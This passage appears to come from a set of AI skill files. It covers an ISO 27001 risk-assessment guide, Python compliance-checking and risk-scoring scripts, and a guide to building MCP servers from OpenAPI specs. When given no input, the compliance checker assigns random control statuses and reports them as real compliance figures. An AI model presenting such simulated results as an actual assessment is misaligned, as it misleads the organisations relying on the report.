| **L4** | 4 (Low) | 8 (Med) | 12 (Med) | 16 (High) | 20 (Crit) |
| **L3** | 3 (Min) | 6 (Low) | 9 (Med) | 12 (Med) | 15 (High) |
| **L2** | 2 (Min) | 4 (Low) | 6 (Low) | 8 (Med) | 10 (Med) |
| **L1** | 1 (Min) | 2 (Min) | 3 (Min) | 4 (Low) | 5 (Low) |
### Risk Levels
| Level | Score Range | Action Required |
|-------|-------------|-----------------|
| Critical | 20-25 | Immediate action, escalate to management |
| High | 15-19 | Treatment plan within 30 days |
| Medium | 10-14 | Treatment plan within 90 days |
| Low | 5-9 | Accept or implement low-cost controls |
| Minimal | 1-4 | Accept risk, document decision |
---
## Risk Treatment
### Treatment Options (ISO 27001)
| Option | Description | When to Use |
|--------|-------------|-------------|
| Modify | Implement controls to reduce risk | Most risks |
| Avoid | Eliminate the risk source | Unacceptable risks |
| Share | Transfer via insurance/outsourcing | High financial impact |
| Retain | Accept the risk | Low risks, cost-prohibitive controls |
### Control Selection Criteria
1. **Effectiveness:** Reduces likelihood or impact
2. **Cost:** Implementation and maintenance costs
3. **Feasibility:** Technical and operational viability
4. **Compliance:** Meets regulatory requirements
5. **Integration:** Works with existing controls
### Residual Risk
After implementing controls:
```
Residual Risk = Inherent Risk × (1 - Control Effectiveness)
```
| Control Effectiveness | Residual Risk Factor |
|----------------------|---------------------|
| 90%+ | Very Low (0.1×) |
| 70-89% | Low (0.2-0.3×) |
| 50-69% | Moderate (0.4-0.5×) |
| <50% | Limited reduction |
---
## Templates and Tools
### Risk Register Template
| Risk ID | Asset | Threat | Vulnerability | L | I | Inherent | Control | Residual | Owner | Status |
|---------|-------|--------|---------------|---|---|----------|---------|----------|-------|--------|
| R001 | Patient DB | Data breach | Weak encryption | 4 | 5 | 20 | AES-256 | 8 | DBA | Open |
| R002 | Admin access | Credential theft | No MFA | 5 | 5 | 25 | MFA | 5 | Security | Closed |
### Risk Assessment Report Sections
1. **Executive Summary**
- Key findings
- Critical/high risks count
- Overall risk posture
2. **Methodology**
- Assessment scope
- Criteria used
- Limitations
3. **Asset Summary**
- Asset inventory
- Classification distribution
4. **Risk Findings**
- Risk register
- Heat map visualization
- Trend analysis
5. **Recommendations**
- Priority treatments
- Timeline and resources
- Residual risk projection
6. **Appendices**
- Detailed asset list
- Threat catalog
- Control mapping
FILE:scripts/compliance_checker.py
#!/usr/bin/env python3
"""
ISO 27001/27002 Compliance Checker
Verify control implementation status and generate compliance reports.
Supports gap analysis and remediation recommendations.
Usage:
python compliance_checker.py --standard iso27001
python compliance_checker.py --standard iso27001 --gap-analysis --output gaps.md
"""
import argparse
import csv
import json
import sys
from datetime import datetime
from typing import Dict, List, Any, Optional
# ISO 27001:2022 Annex A Controls (simplified)
ISO27001_CONTROLS = {
"organizational": {
"name": "Organizational Controls",
"controls": [
{"id": "A.5.1", "name": "Policies for information security", "priority": "high"},
{"id": "A.5.2", "name": "Information security roles and responsibilities", "priority": "high"},
{"id": "A.5.3", "name": "Segregation of duties", "priority": "medium"},
{"id": "A.5.4", "name": "Management responsibilities", "priority": "high"},
{"id": "A.5.5", "name": "Contact with authorities", "priority": "medium"},
{"id": "A.5.6", "name": "Contact with special interest groups", "priority": "low"},
{"id": "A.5.7", "name": "Threat intelligence", "priority": "medium"},
{"id": "A.5.8", "name": "Information security in project management", "priority": "medium"},
{"id": "A.5.9", "name": "Inventory of information and assets", "priority": "high"},
{"id": "A.5.10", "name": "Acceptable use of information", "priority": "high"},
]
},
"people": {
"name": "People Controls",
"controls": [
{"id": "A.6.1", "name": "Screening", "priority": "high"},
{"id": "A.6.2", "name": "Terms and conditions of employment", "priority": "high"},
{"id": "A.6.3", "name": "Information security awareness and training", "priority": "high"},
{"id": "A.6.4", "name": "Disciplinary process", "priority": "medium"},
{"id": "A.6.5", "name": "Responsibilities after termination", "priority": "high"},
{"id": "A.6.6", "name": "Confidentiality agreements", "priority": "high"},
{"id": "A.6.7", "name": "Remote working", "priority": "high"},
{"id": "A.6.8", "name": "Information security event reporting", "priority": "high"},
]
},
"physical": {
"name": "Physical Controls",
"controls": [
{"id": "A.7.1", "name": "Physical security perimeters", "priority": "high"},
{"id": "A.7.2", "name": "Physical entry", "priority": "high"},
{"id": "A.7.3", "name": "Securing offices and facilities", "priority": "medium"},
{"id": "A.7.4", "name": "Physical security monitoring", "priority": "medium"},
{"id": "A.7.5", "name": "Protecting against environmental threats", "priority": "medium"},
{"id": "A.7.6", "name": "Working in secure areas", "priority": "medium"},
{"id": "A.7.7", "name": "Clear desk and screen", "priority": "medium"},
{"id": "A.7.8", "name": "Equipment siting and protection", "priority": "medium"},
]
},
"technological": {
"name": "Technological Controls",
"controls": [
{"id": "A.8.1", "name": "User endpoint devices", "priority": "high"},
{"id": "A.8.2", "name": "Privileged access rights", "priority": "critical"},
{"id": "A.8.3", "name": "Information access restriction", "priority": "high"},
{"id": "A.8.4", "name": "Access to source code", "priority": "high"},
{"id": "A.8.5", "name": "Secure authentication", "priority": "critical"},
{"id": "A.8.6", "name": "Capacity management", "priority": "medium"},
{"id": "A.8.7", "name": "Protection against malware", "priority": "critical"},
{"id": "A.8.8", "name": "Management of technical vulnerabilities", "priority": "critical"},
{"id": "A.8.9", "name": "Configuration management", "priority": "high"},
{"id": "A.8.10", "name": "Information deletion", "priority": "high"},
{"id": "A.8.11", "name": "Data masking", "priority": "medium"},
{"id": "A.8.12", "name": "Data leakage prevention", "priority": "high"},
{"id": "A.8.13", "name": "Information backup", "priority": "critical"},
{"id": "A.8.14", "name": "Redundancy of information processing", "priority": "high"},
{"id": "A.8.15", "name": "Logging", "priority": "critical"},
{"id": "A.8.16", "name": "Monitoring activities", "priority": "high"},
{"id": "A.8.17", "name": "Clock synchronization", "priority": "medium"},
{"id": "A.8.18", "name": "Use of privileged utility programs", "priority": "high"},
{"id": "A.8.19", "name": "Installation of software", "priority": "high"},
{"id": "A.8.20", "name": "Networks security", "priority": "critical"},
{"id": "A.8.21", "name": "Security of network services", "priority": "high"},
{"id": "A.8.22", "name": "Segregation of networks", "priority": "high"},
{"id": "A.8.23", "name": "Web filtering", "priority": "medium"},
{"id": "A.8.24", "name": "Use of cryptography", "priority": "critical"},
{"id": "A.8.25", "name": "Secure development lifecycle", "priority": "high"},
{"id": "A.8.26", "name": "Application security requirements", "priority": "high"},
{"id": "A.8.27", "name": "Secure system architecture", "priority": "high"},
{"id": "A.8.28", "name": "Secure coding", "priority": "high"},
]
},
}
# Remediation recommendations by control
REMEDIATION_GUIDANCE = {
"A.5.1": "Develop and publish information security policy signed by management",
"A.5.2": "Define RACI matrix for security roles; appoint Information Security Manager",
"A.5.9": "Create asset inventory with owners and classification",
"A.6.3": "Implement annual security awareness training program",
"A.6.7": "Establish remote working policy with technical controls",
"A.8.2": "Implement privileged access management (PAM) solution",
"A.8.5": "Deploy MFA for all user and admin accounts",
"A.8.7": "Deploy endpoint protection on all devices with central management",
"A.8.8": "Implement vulnerability scanning with 30-day remediation SLA",
"A.8.13": "Configure automated backups with encryption and offsite storage",
"A.8.15": "Deploy SIEM with log retention per compliance requirements",
"A.8.20": "Implement firewall, IDS/IPS, and network monitoring",
"A.8.24": "Enforce TLS 1.3 for transit, AES-256 for data at rest",
}
def get_control_status(control_id: str, controls_data: Optional[Dict] = None) -> str:
"""Get implementation status for a control."""
if controls_data and control_id in controls_data:
return controls_data[control_id]
# Default: simulate partial implementation
import random
random.seed(hash(control_id))
statuses = ["implemented", "implemented", "partial", "partial", "not_implemented"]
return random.choice(statuses)
def load_controls_from_csv(filepath: str) -> Dict[str, str]:
"""Load control status from CSV file."""
controls = {}
try:
with open(filepath, "r", encoding="utf-8") as f:
reader = csv.DictReader(f)
for row in reader:
control_id = row.get("control_id", row.get("id", ""))
status = row.get("status", "not_implemented").lower()
if control_id:
controls[control_id] = status
except FileNotFoundError:
print(f"Error: Controls file not found: {filepath}", file=sys.stderr)
sys.exit(1)
return controls
def check_compliance(
standard: str,
controls_data: Optional[Dict] = None,
domains: Optional[List[str]] = None
) -> Dict[str, Any]:
"""Check compliance against standard controls."""
if standard not in ["iso27001", "iso27002"]:
print(f"Error: Unsupported standard: {standard}", file=sys.stderr)
sys.exit(1)
results = {
"standard": standard,
"timestamp": datetime.now().isoformat(),
"domains": {},
"summary": {
"total_controls": 0,
"implemented": 0,
"partial": 0,
"not_implemented": 0,
},
"findings": [],
}
for domain_key, domain_data in ISO27001_CONTROLS.items():
if domains and domain_key not in domains:
continue
domain_results = {
"name": domain_data["name"],
"controls": [],
"implemented": 0,
"partial": 0,
"not_implemented": 0,
}
for control in domain_data["controls"]:
status = get_control_status(control["id"], controls_data)
control_result = {
"id": control["id"],
"name": control["name"],
"priority": control["priority"],
"status": status,
}
domain_results["controls"].append(control_result)
results["summary"]["total_controls"] += 1
if status == "implemented":
domain_results["implemented"] += 1
results["summary"]["implemented"] += 1
elif status == "partial":
domain_results["partial"] += 1
results["summary"]["partial"] += 1
else:
domain_results["not_implemented"] += 1
results["summary"]["not_implemented"] += 1
# Add to findings if high priority
if control["priority"] in ["critical", "high"]:
results["findings"].append({
"control_id": control["id"],
"control_name": control["name"],
"priority": control["priority"],
"status": status,
"remediation": REMEDIATION_GUIDANCE.get(
control["id"],
"Implement control per ISO 27001 requirements"
),
})
results["domains"][domain_key] = domain_results
# Calculate compliance percentage
total = results["summary"]["total_controls"]
implemented = results["summary"]["implemented"]
partial = results["summary"]["partial"]
results["summary"]["compliance_percentage"] = round(
((implemented + partial * 0.5) / total) * 100, 1
) if total > 0 else 0
return results
def generate_gap_analysis(results: Dict[str, Any]) -> List[Dict[str, Any]]:
"""Generate gap analysis with prioritized recommendations."""
gaps = []
for finding in results["findings"]:
gap = {
"control_id": finding["control_id"],
"control_name": finding["control_name"],
"current_status": finding["status"],
"priority": finding["priority"],
"remediation": finding["remediation"],
"effort": "medium" if finding["priority"] == "high" else "high",
"timeline": "30 days" if finding["priority"] == "critical" else "90 days",
}
gaps.append(gap)
# Sort by priority
priority_order = {"critical": 0, "high": 1, "medium": 2, "low": 3}
gaps.sort(key=lambda x: priority_order.get(x["priority"], 99))
return gaps
def format_output(
results: Dict[str, Any],
gap_analysis: bool,
output_format: str
) -> str:
"""Format compliance results for output."""
if output_format == "json":
if gap_analysis:
results["gap_analysis"] = generate_gap_analysis(results)
return json.dumps(results, indent=2)
# Markdown format
lines = [
f"# {results['standard'].upper()} Compliance Report",
f"",
f"**Generated:** {results['timestamp']}",
f"",
f"## Summary",
f"",
f"| Metric | Value |",
f"|--------|-------|",
f"| Total Controls | {results['summary']['total_controls']} |",
f"| Implemented | {results['summary']['implemented']} |",
f"| Partial | {results['summary']['partial']} |",
f"| Not Implemented | {results['summary']['not_implemented']} |",
f"| **Compliance** | **{results['summary']['compliance_percentage']}%** |",
f"",
]
# Domain breakdown
lines.extend([
f"## Compliance by Domain",
f"",
f"| Domain | Implemented | Partial | Not Impl | Score |",
f"|--------|-------------|---------|----------|-------|",
])
for domain_key, domain_data in results["domains"].items():
total = len(domain_data["controls"])
score = round(
((domain_data["implemented"] + domain_data["partial"] * 0.5) / total) * 100
) if total > 0 else 0
lines.append(
f"| {domain_data['name']} | {domain_data['implemented']} | "
f"{domain_data['partial']} | {domain_data['not_implemented']} | {score}% |"
)
# Findings
if results["findings"]:
lines.extend([
f"",
f"## Priority Findings",
f"",
f"| Control | Name | Priority | Status |",
f"|---------|------|----------|--------|",
])
for finding in results["findings"][:15]: # Top 15
lines.append(
f"| {finding['control_id']} | {finding['control_name']} | "
f"{finding['priority'].capitalize()} | {finding['status'].replace('_', ' ').capitalize()} |"
)
# Gap analysis
if gap_analysis:
gaps = generate_gap_analysis(results)
lines.extend([
f"",
f"## Gap Analysis & Remediation",
f"",
])
for gap in gaps[:10]: # Top 10 gaps
lines.extend([
f"### {gap['control_id']}: {gap['control_name']}",
f"",
f"- **Priority:** {gap['priority'].capitalize()}",
f"- **Current Status:** {gap['current_status'].replace('_', ' ').capitalize()}",
f"- **Remediation:** {gap['remediation']}",
f"- **Timeline:** {gap['timeline']}",
f"",
])
return "\n".join(lines)
def main():
parser = argparse.ArgumentParser(
description="ISO 27001/27002 Compliance Checker"
)
parser.add_argument(
"--standard", "-s",
required=True,
choices=["iso27001", "iso27002", "hipaa"],
help="Compliance standard to check"
)
parser.add_argument(
"--controls-file", "-c",
help="CSV file with current control implementation status"
)
parser.add_argument(
"--gap-analysis", "-g",
action="store_true",
help="Include gap analysis with remediation recommendations"
)
parser.add_argument(
"--domains", "-d",
help="Comma-separated list of domains to check (e.g., organizational,technological)"
)
parser.add_argument(
"--output", "-o",
help="Output file path (default: stdout)"
)
parser.add_argument(
"--format", "-f",
choices=["json", "markdown"],
default="markdown",
help="Output format (default: markdown)"
)
args = parser.parse_args()
# Load control status if provided
controls_data = None
if args.controls_file:
controls_data = load_controls_from_csv(args.controls_file)
# Parse domains
domains = None
if args.domains:
domains = [d.strip().lower().replace("-", "_") for d in args.domains.split(",")]
# Check compliance
results = check_compliance(args.standard, controls_data, domains)
# Format output
output = format_output(results, args.gap_analysis, args.format)
# Write output
if args.output:
with open(args.output, "w", encoding="utf-8") as f:
f.write(output)
print(f"Report saved to: {args.output}", file=sys.stderr)
else:
print(output)
if __name__ == "__main__":
main()
FILE:scripts/risk_assessment.py
#!/usr/bin/env python3
"""
Security Risk Assessment Tool
Automated risk assessment following ISO 27001 Clause 6.1.2 methodology.
Identifies assets, threats, vulnerabilities, and calculates risk scores.
Usage:
python risk_assessment.py --scope "system-name" --output risks.json
python risk_assessment.py --assets assets.csv --template healthcare
"""
import argparse
import csv
import json
import sys
from datetime import datetime
from typing import Dict, List, Any, Optional
# Threat catalogs by template
THREAT_CATALOGS = {
"general": [
{"id": "T01", "name": "Unauthorized access", "category": "Access", "likelihood": 4},
{"id": "T02", "name": "Data breach", "category": "Confidentiality", "likelihood": 3},
{"id": "T03", "name": "Malware infection", "category": "Integrity", "likelihood": 4},
{"id": "T04", "name": "Phishing attack", "category": "Social Engineering", "likelihood": 5},
{"id": "T05", "name": "Denial of service", "category": "Availability", "likelihood": 3},
{"id": "T06", "name": "Insider threat", "category": "Personnel", "likelihood": 2},
{"id": "T07", "name": "Physical theft", "category": "Physical", "likelihood": 2},
{"id": "T08", "name": "System misconfiguration", "category": "Technical", "likelihood": 4},
{"id": "T09", "name": "Third-party compromise", "category": "Supply Chain", "likelihood": 3},
{"id": "T10", "name": "Natural disaster", "category": "Environmental", "likelihood": 1},
],
"healthcare": [
{"id": "T01", "name": "Patient data breach", "category": "Confidentiality", "likelihood": 4},
{"id": "T02", "name": "Ransomware attack", "category": "Availability", "likelihood": 4},
{"id": "T03", "name": "Medical device tampering", "category": "Integrity", "likelihood": 3},
{"id": "T04", "name": "EHR unauthorized access", "category": "Access", "likelihood": 4},
{"id": "T05", "name": "HIPAA violation", "category": "Compliance", "likelihood": 3},
{"id": "T06", "name": "Clinical data corruption", "category": "Integrity", "likelihood": 2},
{"id": "T07", "name": "Telemedicine interception", "category": "Confidentiality", "likelihood": 3},
{"id": "T08", "name": "Credential theft", "category": "Access", "likelihood": 5},
{"id": "T09", "name": "Third-party vendor breach", "category": "Supply Chain", "likelihood": 3},
{"id": "T10", "name": "Insider data theft", "category": "Personnel", "likelihood": 2},
],
"cloud": [
{"id": "T01", "name": "Cloud misconfiguration", "category": "Technical", "likelihood": 5},
{"id": "T02", "name": "API vulnerability exploit", "category": "Application", "likelihood": 4},
{"id": "T03", "name": "Account hijacking", "category": "Access", "likelihood": 4},
{"id": "T04", "name": "Data exfiltration", "category": "Confidentiality", "likelihood": 3},
{"id": "T05", "name": "Shared tenancy attack", "category": "Infrastructure", "likelihood": 2},
{"id": "T06", "name": "Service outage", "category": "Availability", "likelihood": 3},
{"id": "T07", "name": "Compliance violation", "category": "Compliance", "likelihood": 3},
{"id": "T08", "name": "Shadow IT exposure", "category": "Governance", "likelihood": 4},
{"id": "T09", "name": "Encryption key exposure", "category": "Cryptography", "likelihood": 2},
{"id": "T10", "name": "CSP vendor lock-in", "category": "Strategic", "likelihood": 3},
],
}
# Vulnerability patterns
VULNERABILITY_PATTERNS = {
"access": ["No MFA", "Weak passwords", "Excessive privileges", "Shared accounts"],
"technical": ["Unpatched systems", "Weak encryption", "Missing logging", "Open ports"],
"process": ["No incident response", "Missing backups", "No change control", "Lack of monitoring"],
"people": ["Untrained staff", "No security awareness", "Social engineering susceptibility"],
}
# Asset classification criteria
CLASSIFICATION_CRITERIA = {
"critical": {"description": "Business-critical, severe impact if compromised", "impact": 5},
"high": {"description": "Important assets, significant impact", "impact": 4},
"medium": {"description": "Standard business assets, moderate impact", "impact": 3},
"low": {"description": "Limited business value, minor impact", "impact": 2},
"minimal": {"description": "Public or non-sensitive, negligible impact", "impact": 1},
}
# Risk treatment options
TREATMENT_OPTIONS = {
"critical": "Immediate mitigation required - implement controls within 7 days",
"high": "Priority mitigation - implement controls within 30 days",
"medium": "Planned mitigation - implement controls within 90 days",
"low": "Accept risk with monitoring or implement low-cost controls",
"minimal": "Accept risk - document acceptance decision",
}
def calculate_risk_score(likelihood: int, impact: int) -> int:
"""Calculate risk score as likelihood × impact."""
return likelihood * impact
def get_risk_level(score: int) -> str:
"""Determine risk level from score."""
if score >= 20:
return "critical"
elif score >= 15:
return "high"
elif score >= 10:
return "medium"
elif score >= 5:
return "low"
return "minimal"
def load_assets_from_csv(filepath: str) -> List[Dict[str, Any]]:
"""Load asset inventory from CSV file."""
assets = []
try:
with open(filepath, "r", encoding="utf-8") as f:
reader = csv.DictReader(f)
for row in reader:
asset = {
"id": row.get("id", f"A{len(assets)+1:03d}"),
"name": row.get("name", "Unknown"),
"type": row.get("type", "Information"),
"owner": row.get("owner", "Unassigned"),
"classification": row.get("classification", "medium").lower(),
}
assets.append(asset)
except FileNotFoundError:
print(f"Error: Asset file not found: {filepath}", file=sys.stderr)
sys.exit(1)
except Exception as e:
print(f"Error reading asset file: {e}", file=sys.stderr)
sys.exit(1)
return assets
def generate_sample_assets(scope: str, template: str) -> List[Dict[str, Any]]:
"""Generate sample asset inventory based on scope and template."""
base_assets = []
if template == "healthcare":
base_assets = [
{"id": "A001", "name": "Patient Database", "type": "Information", "owner": "DBA Team", "classification": "critical"},
{"id": "A002", "name": "EHR Application", "type": "Software", "owner": "App Team", "classification": "critical"},
{"id": "A003", "name": "Medical Imaging System", "type": "Software", "owner": "Radiology", "classification": "high"},
{"id": "A004", "name": "Database Servers", "type": "Hardware", "owner": "Infrastructure", "classification": "high"},
{"id": "A005", "name": "Admin Credentials", "type": "Access", "owner": "Security", "classification": "critical"},
{"id": "A006", "name": "Backup Systems", "type": "Service", "owner": "IT Ops", "classification": "high"},
{"id": "A007", "name": "Network Infrastructure", "type": "Hardware", "owner": "Network Team", "classification": "high"},
{"id": "A008", "name": "API Gateway", "type": "Software", "owner": "Platform Team", "classification": "high"},
]
elif template == "cloud":
base_assets = [
{"id": "A001", "name": "Cloud Storage Buckets", "type": "Service", "owner": "Platform", "classification": "high"},
{"id": "A002", "name": "Container Registry", "type": "Service", "owner": "DevOps", "classification": "high"},
{"id": "A003", "name": "API Services", "type": "Software", "owner": "Engineering", "classification": "critical"},
{"id": "A004", "name": "Database Instances", "type": "Service", "owner": "DBA Team", "classification": "critical"},
{"id": "A005", "name": "IAM Configuration", "type": "Access", "owner": "Security", "classification": "critical"},
{"id": "A006", "name": "Secrets Manager", "type": "Service", "owner": "Security", "classification": "critical"},
{"id": "A007", "name": "Load Balancers", "type": "Infrastructure", "owner": "Platform", "classification": "high"},
{"id": "A008", "name": "Monitoring Systems", "type": "Service", "owner": "SRE", "classification": "medium"},
]
else: # general
base_assets = [
{"id": "A001", "name": "Corporate Data", "type": "Information", "owner": "Data Team", "classification": "high"},
{"id": "A002", "name": "Business Applications", "type": "Software", "owner": "IT", "classification": "high"},
{"id": "A003", "name": "Server Infrastructure", "type": "Hardware", "owner": "Infrastructure", "classification": "high"},
{"id": "A004", "name": "User Credentials", "type": "Access", "owner": "Security", "classification": "critical"},
{"id": "A005", "name": "Email System", "type": "Service", "owner": "IT", "classification": "medium"},
{"id": "A006", "name": "File Servers", "type": "Hardware", "owner": "Infrastructure", "classification": "medium"},
{"id": "A007", "name": "Network Equipment", "type": "Hardware", "owner": "Network", "classification": "high"},
{"id": "A008", "name": "Backup Infrastructure", "type": "Service", "owner": "IT Ops", "classification": "high"},
]
# Tag assets with scope
for asset in base_assets:
asset["scope"] = scope
return base_assets
def assess_risks(
assets: List[Dict[str, Any]],
template: str
) -> List[Dict[str, Any]]:
"""Perform risk assessment on assets."""
threats = THREAT_CATALOGS.get(template, THREAT_CATALOGS["general"])
risks = []
risk_id = 1
for asset in assets:
classification = asset.get("classification", "medium")
impact = CLASSIFICATION_CRITERIA.get(classification, {}).get("impact", 3)
# Map relevant threats to asset
relevant_threats = threats[:5] # Top 5 threats for each asset
for threat in relevant_threats:
likelihood = threat["likelihood"]
score = calculate_risk_score(likelihood, impact)
level = get_risk_level(score)
# Identify potential vulnerabilities
vuln_category = threat["category"].lower()
vulns = VULNERABILITY_PATTERNS.get("technical", ["Unknown vulnerability"])
if "access" in vuln_category:
vulns = VULNERABILITY_PATTERNS["access"]
elif "personnel" in vuln_category or "social" in vuln_category:
vulns = VULNERABILITY_PATTERNS["people"]
risk = {
"id": f"R{risk_id:03d}",
"asset_id": asset["id"],
"asset_name": asset["name"],
"threat_id": threat["id"],
"threat_name": threat["name"],
"threat_category": threat["category"],
"vulnerability": vulns[0] if vulns else "Unidentified",
"likelihood": likelihood,
"impact": impact,
"score": score,
"level": level,
"treatment": TREATMENT_OPTIONS.get(level, "Review required"),
}
risks.append(risk)
risk_id += 1
# Sort by risk score descending
risks.sort(key=lambda x: x["score"], reverse=True)
return risks
def calculate_residual_risk(risk: Dict[str, Any], control_effectiveness: float = 0.7) -> Dict[str, Any]:
"""Calculate residual risk after applying controls."""
residual_likelihood = max(1, int(risk["likelihood"] * (1 - control_effectiveness)))
residual_score = calculate_risk_score(residual_likelihood, risk["impact"])
return {
"risk_id": risk["id"],
"inherent_score": risk["score"],
"control_effectiveness": control_effectiveness,
"residual_likelihood": residual_likelihood,
"residual_score": residual_score,
"residual_level": get_risk_level(residual_score),
}
def generate_report(
scope: str,
template: str,
assets: List[Dict[str, Any]],
risks: List[Dict[str, Any]],
output_format: str
) -> str:
"""Generate risk assessment report."""
timestamp = datetime.now().isoformat()
# Calculate summary statistics
risk_counts = {"critical": 0, "high": 0, "medium": 0, "low": 0, "minimal": 0}
for risk in risks:
risk_counts[risk["level"]] += 1
report_data = {
"metadata": {
"scope": scope,
"template": template,
"timestamp": timestamp,
"methodology": "ISO 27001 Clause 6.1.2",
},
"summary": {
"total_assets": len(assets),
"total_risks": len(risks),
"risk_distribution": risk_counts,
"critical_risks": risk_counts["critical"],
"high_risks": risk_counts["high"],
},
"assets": assets,
"risks": risks,
"residual_risks": [calculate_residual_risk(r) for r in risks[:10]], # Top 10
}
if output_format == "json":
return json.dumps(report_data, indent=2)
elif output_format == "csv":
lines = ["risk_id,asset,threat,likelihood,impact,score,level,treatment"]
for risk in risks:
lines.append(
f"{risk['id']},{risk['asset_name']},{risk['threat_name']},"
f"{risk['likelihood']},{risk['impact']},{risk['score']},"
f"{risk['level']},{risk['treatment']}"
)
return "\n".join(lines)
else: # markdown
lines = [
f"# Security Risk Assessment Report",
f"",
f"**Scope:** {scope}",
f"**Template:** {template}",
f"**Date:** {timestamp}",
f"**Methodology:** ISO 27001 Clause 6.1.2",
f"",
f"## Summary",
f"",
f"| Metric | Value |",
f"|--------|-------|",
f"| Total Assets | {len(assets)} |",
f"| Total Risks | {len(risks)} |",
f"| Critical Risks | {risk_counts['critical']} |",
f"| High Risks | {risk_counts['high']} |",
f"| Medium Risks | {risk_counts['medium']} |",
f"",
f"## Asset Inventory",
f"",
f"| ID | Asset | Type | Owner | Classification |",
f"|----|-------|------|-------|----------------|",
]
for asset in assets:
lines.append(
f"| {asset['id']} | {asset['name']} | {asset['type']} | "
f"{asset['owner']} | {asset['classification'].capitalize()} |"
)
lines.extend([
f"",
f"## Risk Register",
f"",
f"| Risk ID | Asset | Threat | L | I | Score | Level |",
f"|---------|-------|--------|---|---|-------|-------|",
])
for risk in risks[:20]: # Top 20 risks
lines.append(
f"| {risk['id']} | {risk['asset_name']} | {risk['threat_name']} | "
f"{risk['likelihood']} | {risk['impact']} | {risk['score']} | "
f"{risk['level'].capitalize()} |"
)
lines.extend([
f"",
f"## Treatment Recommendations",
f"",
])
for level, treatment in TREATMENT_OPTIONS.items():
count = risk_counts[level]
if count > 0:
lines.append(f"**{level.capitalize()} ({count} risks):** {treatment}")
return "\n".join(lines)
def main():
parser = argparse.ArgumentParser(
description="Security Risk Assessment Tool - ISO 27001 Clause 6.1.2"
)
parser.add_argument(
"--scope", "-s",
required=True,
help="System or area to assess"
)
parser.add_argument(
"--template", "-t",
choices=["general", "healthcare", "cloud"],
default="general",
help="Assessment template (default: general)"
)
parser.add_argument(
"--assets", "-a",
help="CSV file with asset inventory"
)
parser.add_argument(
"--output", "-o",
help="Output file path (default: stdout)"
)
parser.add_argument(
"--format", "-f",
choices=["json", "csv", "markdown"],
default="markdown",
help="Output format (default: markdown)"
)
args = parser.parse_args()
# Load or generate assets
if args.assets:
assets = load_assets_from_csv(args.assets)
else:
assets = generate_sample_assets(args.scope, args.template)
# Perform risk assessment
risks = assess_risks(assets, args.template)
# Generate report
report = generate_report(
args.scope,
args.template,
assets,
risks,
args.format
)
# Output
if args.output:
with open(args.output, "w", encoding="utf-8") as f:
f.write(report)
print(f"Report saved to: {args.output}", file=sys.stderr)
else:
print(report)
if __name__ == "__main__":
main()
Thiết kế và triển khai MCP server sẵn sàng production từ hợp đồng OpenAPI, hỗ trợ Python và TypeScript, kiểm tra schema và tiến hóa an toàn.
---
name: "mcp-server-builder"
description: "Design and ship production-ready MCP (Model Context Protocol) servers from OpenAPI contracts instead of hand-written tool wrappers. Python and TypeScript support, schema validation, safe evolution. Use when exposing an existing API as an MCP server, building tool integrations for Claude or Codex or Cursor, or scaffolding an MCP project from scratch."
---
# MCP Server Builder
**Tier:** POWERFUL
**Category:** Engineering
**Domain:** AI / API Integration
## Overview
Use this skill to design and ship production-ready MCP servers from API contracts instead of hand-written one-off tool wrappers. It focuses on fast scaffolding, schema quality, validation, and safe evolution.
The workflow supports both Python and TypeScript MCP implementations and treats OpenAPI as the source of truth.
## Core Capabilities
- Convert OpenAPI paths/operations into MCP tool definitions
- Generate starter server scaffolds (Python or TypeScript)
- Enforce naming, descriptions, and schema consistency
- Validate MCP tool manifests for common production failures
- Apply versioning and backward-compatibility checks
- Separate transport/runtime decisions from tool contract design
## When to Use
- You need to expose an internal/external REST API to an LLM agent
- You are replacing brittle browser automation with typed tools
- You want one MCP server shared across teams and assistants
- You need repeatable quality checks before publishing MCP tools
- You want to bootstrap an MCP server from existing OpenAPI specs
## Key Workflows
### 1. OpenAPI to MCP Scaffold
1. Start from a valid OpenAPI spec.
2. Generate tool manifest + starter server code.
3. Review naming and auth strategy.
4. Add endpoint-specific runtime logic.
```bash
python3 scripts/openapi_to_mcp.py \
--input openapi.json \
--server-name billing-mcp \
--language python \
--output-dir ./out \
--format text
```
Supports stdin as well:
```bash
cat openapi.json | python3 scripts/openapi_to_mcp.py --server-name billing-mcp --language typescript
```
### 2. Validate MCP Tool Definitions
Run validator before integration tests:
```bash
python3 scripts/mcp_validator.py --input out/tool_manifest.json --strict --format text
```
Checks include duplicate names, invalid schema shape, missing descriptions, empty required fields, and naming hygiene.
### 3. Runtime Selection
- Choose **Python** for fast iteration and data-heavy backends.
- Choose **TypeScript** for unified JS stacks and tighter frontend/backend contract reuse.
- Keep tool contracts stable even if transport/runtime changes.
### 4. Auth & Safety Design
- Keep secrets in env, not in tool schemas.
- Prefer explicit allowlists for outbound hosts.
- Return structured errors (`code`, `message`, `details`) for agent recovery.
- Avoid destructive operations without explicit confirmation inputs.
### 5. Versioning Strategy
- Additive fields only for non-breaking updates.
- Never rename tool names in-place.
- Introduce new tool IDs for breaking behavior changes.
- Maintain changelog of tool contracts per release.
## Script Interfaces
- `python3 scripts/openapi_to_mcp.py --help`
- Reads OpenAPI from stdin or `--input`
- Produces manifest + server scaffold
- Emits JSON summary or text report
- `python3 scripts/mcp_validator.py --help`
- Validates manifests and optional runtime config
- Returns non-zero exit in strict mode when errors exist
## Common Pitfalls
1. Tool names derived directly from raw paths (`get__v1__users___id`)
2. Missing operation descriptions (agents choose tools poorly)
3. Ambiguous parameter schemas with no required fields
4. Mixing transport errors and domain errors in one opaque message
5. Building tool contracts that expose secret values
6. Breaking clients by changing schema keys without versioning
## Best Practices
1. Use `operationId` as canonical tool name when available.
2. Keep one task intent per tool; avoid mega-tools.
3. Add concise descriptions with action verbs.
4. Validate contracts in CI using strict mode.
5. Keep generated scaffold committed, then customize incrementally.
6. Pair contract changes with changelog entries.
## Reference Material
- [references/openapi-extraction-guide.md](references/openapi-extraction-guide.md)
- [references/python-server-template.md](references/python-server-template.md)
- [references/typescript-server-template.md](references/typescript-server-template.md)
- [references/validation-checklist.md](references/validation-checklist.md)
- [README.md](README.md)
## Architecture Decisions
Choose the server approach per constraint:
- Python runtime: faster iteration, data pipelines, backend-heavy teams
- TypeScript runtime: shared types with JS stack, frontend-heavy teams
- Single MCP server: easiest operations, broader blast radius
- Split domain servers: cleaner ownership and safer change boundaries
## Contract Quality Gates
Before publishing a manifest:
1. Every tool has clear verb-first name.
2. Every tool description explains intent and expected result.
3. Every required field is explicitly typed.
4. Destructive actions include confirmation parameters.
5. Error payload format is consistent across all tools.
6. Validator returns zero errors in strict mode.
## Testing Strategy
